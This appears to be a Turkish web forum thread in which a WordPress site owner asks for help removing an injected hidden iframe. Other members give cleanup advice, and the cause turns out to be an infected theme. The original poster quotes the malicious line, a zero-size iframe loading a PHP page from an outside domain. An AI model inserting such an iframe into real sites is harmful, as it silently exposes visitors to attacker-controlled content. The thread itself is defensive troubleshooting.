• 1. Daha Önce SEOcry.com üstünden yayın yapan sitemiz Cryptosam Forum olarak yeni alan adımıza aktarılmıştır.
    2. Sitemize kayıtlar incelemeden geçerek tamamlanmaktadır. Tüm kayıtları tek tek inceleyerek platformumuzda en doğru kişiler ile fikir alış verişi yapmaya - yapmanıza gayret ediyoruz.

WordPress Iframe Virüs Konusu

oalatumur

Kayıtlı Kullanıcı
selam arkadaşlar,

Wordpress sitenizde sizden habersiz oluşan iframe hidden link yönlenme konusunda tecrübesi olan varmı.iframe virüsü diyorlar buna ve önemli bir siteme bulaştı.

tecrübesi olan varsa nasıl sileceğimi anlatabilir mi ?
 
Selam. Hangi dosyaya bulaştı?
batur hocam vakıt ayırdıgın ıcın tesekkurler, sıtedekı her sayfada view source içerisinde yer alıyor.ilgili satır aşağıdaki gibidir.Hangi dosyadan bulaştı nerede duruyor çözemedim hala

PHP:
</iframe><iframe src="http://phoenix-credit.com/wp-content/cache.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
 
Site dosyalarında arama yaparak, ilgili iframe kodlarını bulmaya çalışın. Ayrıca dosya cmod değerlerini gözden geçirin. wp-config.php dosyasının cmod ayarını 600 yapın.
 
valla gozden geçırmedıgım alan kalmadı, hostıngemı bulaştı nedır anlamadım, yenı sıteye kurmaya doğru gidiyorum yavaş yavaş ama hayırlısı
 
Dosyaları bilgisayarınıza indirin ve Notepad++

gibi bir programla iframe ya da phoenix aramaları yapın. Bulunamazsa, base64 şeklinde arama yapın. Belki şifrelenmiştir kodlar.
 
şifrelenmişlere bakmadım ama sorunu buldum, temadan kaynaklıydı, tamayı dısable edınce sıte kendıne geldı, temanın yenı versıyonunu kontrol edıp, eskısını sılerek yenıden yukleyecegım.

w****z de kullanmıyorum kı anlamadım nereden musallat oldu.hosting desen paylaşımlı degış dırekt kendıme aıt VDS ve tek domain kullanıyor.

neyse sımdılık atlattım gıbı sorunu, problemın sebebını bulmak = çözmek :)

sagol hocam ılgın ıcın
 
Tema w***z olmasa da bazı temalarda bu sorunu bende yaşadım zamanında ve genelde temayı ftp den indirip notepad veya başka bir programla açınca görünmeyebiliyor bazen. Ben cpanel den file managerden görebiliyordum ve oradan düzenliyordum dosyayı. config.php izinlerini 0444 yapsan da tema içinde sürekli kendisini çalıştıran bir dosya var ve yeniden geliyor. Bazende DNS ayarlarında A kaydı oluşturarak site her yere senin mail adresinden binlerce mail gönderiyor. Sıunucunda PHP mail fonksiyonu kapalıysa ve SMTP de gönderim limiti varsa sorun olmuyor ama yoksa sıkıntı.

Ben o temayı kullanmaktan vazgeçerek, temiz bir wordpress kurulumu yaptım eski siteden verileri dışarı aktardım ve yeni siteye yükledim. O şekilde kurtulmuştum. İnşallah daha az sıkınıtıyla kurtulursun hocam.

Bu arada ftp şifresini mutlaka değiştir hocam.
 
Tema w***z olmasa da bazı temalarda bu sorunu bende yaşadım zamanında ve genelde temayı ftp den indirip notepad veya başka bir programla açınca görünmeyebiliyor bazen. Ben cpanel den file managerden görebiliyordum ve oradan düzenliyordum dosyayı. config.php izinlerini 0444 yapsan da tema içinde sürekli kendisini çalıştıran bir dosya var ve yeniden geliyor. Bazende DNS ayarlarında A kaydı oluşturarak site her yere senin mail adresinden binlerce mail gönderiyor. Sıunucunda PHP mail fonksiyonu kapalıysa ve SMTP de gönderim limiti varsa sorun olmuyor ama yoksa sıkıntı.

Ben o temayı kullanmaktan vazgeçerek, temiz bir wordpress kurulumu yaptım eski siteden verileri dışarı aktardım ve yeni siteye yükledim. O şekilde kurtulmuştum. İnşallah daha az sıkınıtıyla kurtulursun hocam.

Bu arada ftp şifresini mutlaka değiştir hocam.

mail gönderme olayıda cıdden sıkıntı ancak saatlık lımıt var, saatte 10 adet :D
temanın yenı versıyonunu kurunca duzeltı, hemen sıfrelerıde degıştırdım zaten

tesekkur ederım cevabın ıcın ustad
 
Var olan temadan değil tema dizininde bulunan başka temalardan da bulaşabiliyor hocam. Kullandığınız tema hariç temaları silin. Zararlı kodları bulup silmeye çalışın ftp şifrelerini değiştirin.

Bilgisayarda da virüs taraması yapın tekrar şifr değiştirin vb işlemler işte :)
 
Var olan temadan değil tema dizininde bulunan başka temalardan da bulaşabiliyor hocam. Kullandığınız tema hariç temaları silin. Zararlı kodları bulup silmeye çalışın ftp şifrelerini değiştirin.

Bilgisayarda da virüs taraması yapın tekrar şifr değiştirin vb işlemler işte :)

hocam zaten o sekılde kullanıyorum.sıtelerde pasıf durumda olan hıb bır eklentı ya da temadı bekletmem, dırekt sılerım.
 
hocam zaten o sekılde kullanıyorum.sıtelerde pasıf durumda olan hıb bır eklentı ya da temadı bekletmem, dırekt sılerım.
wp.org dışında eklentiniz varsa onları silin. Zararlı kodu bulup silip ve dediklerimi yptıktan snra hala geri geliyorsa virüs format da gerekebilir çünkü filezilladan ulaşıyor olabilirler sitene.
 
wp.org dışında eklentiniz varsa onları silin. Zararlı kodu bulup silip ve dediklerimi yptıktan snra hala geri geliyorsa virüs format da gerekebilir çünkü filezilladan ulaşıyor olabilirler sitene.
vmware de yenı bır pc kurarak dosya transferlerını yaptım.sorun temadaydı, temayı sılım yenı dosyaları kopyalayınca miss gibi oldu
 
Uzun zaman önce bu virüsü temizlemek için çok uğraşmıştım.

Ben kodun hangi dosyalara bulaştığını anlamak için Advanced Find And Replace programını kullanmıştım. Dosyalarda toplu arama yapmaya yarar bu program.

Virüs bilgisayara bulaşıyordu diye hatırlıyorum. Ftp şifresini değiştirsek dahi ftpye bağlanınca kodlar tekrar yükleniyordu. Tekrar bu sorunla karşılaşırsanız bilgisayardaki virüsü temizlemek(mümkünse format), ftp şifresini değiştirmek kesin çözüm olur.
 
Uzun zaman önce bu virüsü temizlemek için çok uğraşmıştım.

Ben kodun hangi dosyalara bulaştığını anlamak için Advanced Find And Replace programını kullanmıştım. Dosyalarda toplu arama yapmaya yarar bu program.

Virüs bilgisayara bulaşıyordu diye hatırlıyorum. Ftp şifresini değiştirsek dahi ftpye bağlanınca kodlar tekrar yükleniyordu. Tekrar bu sorunla karşılaşırsanız bilgisayardaki virüsü temizlemek(mümkünse format), ftp şifresini değiştirmek kesin çözüm olur.

hocam programın adını aldım, eger dedıgınız ıslerı duzgun yapıyorsa guzel program.en yakın zamanda test edicem.
teşekkür ederim
 
Geri
Üst